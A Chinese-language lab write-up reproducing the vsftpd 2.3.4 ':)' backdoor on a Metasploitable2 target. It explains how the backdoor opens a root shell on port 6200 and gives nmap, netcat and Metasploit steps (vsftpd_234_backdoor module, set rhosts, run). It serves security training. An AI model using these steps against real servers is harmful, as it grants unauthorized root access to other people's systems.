Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞)
- 一、原理
- 二、复现准备
- 三、漏洞复现
- 四、Metasploit利用脚本复现
一、原理
- vsftpd 是“ very secure FTP daemon ”的缩写,安全性是它的一个最大的特点。 vsftpd是一个 UNIX 类操作系统上运行的服务器的名字,它可以运行在诸如 Linux 、 BSD 、 Solaris 、HP UNIX 等系统上面,是一个完全免费的、开放源代码的 ftp 服务器软件,支持很多其他的FTP 服务器所不支持的特征
- 笑脸漏洞:这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“
:)
”,密码任意,即可运行vsf_sysutil_extra()
:打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:)
,所以称笑脸漏洞
二、复现准备
- 靶机:Metasplotable2-Linux - 192.168.9.147
- 攻击机:Kali - 192.168.9.148
三、漏洞复现
-
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4
-
利用
netcat
,连接靶机的21端口,输入user带有:)
,pass随便输入
-
nmap扫描端口6200,观察端口打开情况:已经开启
-
用
nc
连接6200端口,成功以root身份登入
四、Metasploit利用脚本复现
- 命令行输入msfconsole打开Metasploit
msfconsole
- 搜索vsftpd2.3.4的漏洞脚本
search vsftpd 2.3.4
- 使用
use
命令,使用漏洞脚本
use 0
# 也可以是 use exploit/unix/ftp/vsftpd_234_backdoor
-
查看漏洞主要信息,
yes
选项是我们需要设置的,RPORT
已经设置了,还需要设置RHOSTS
-
设置目标主机
set rhosts 192.168.9.147
- 攻击
run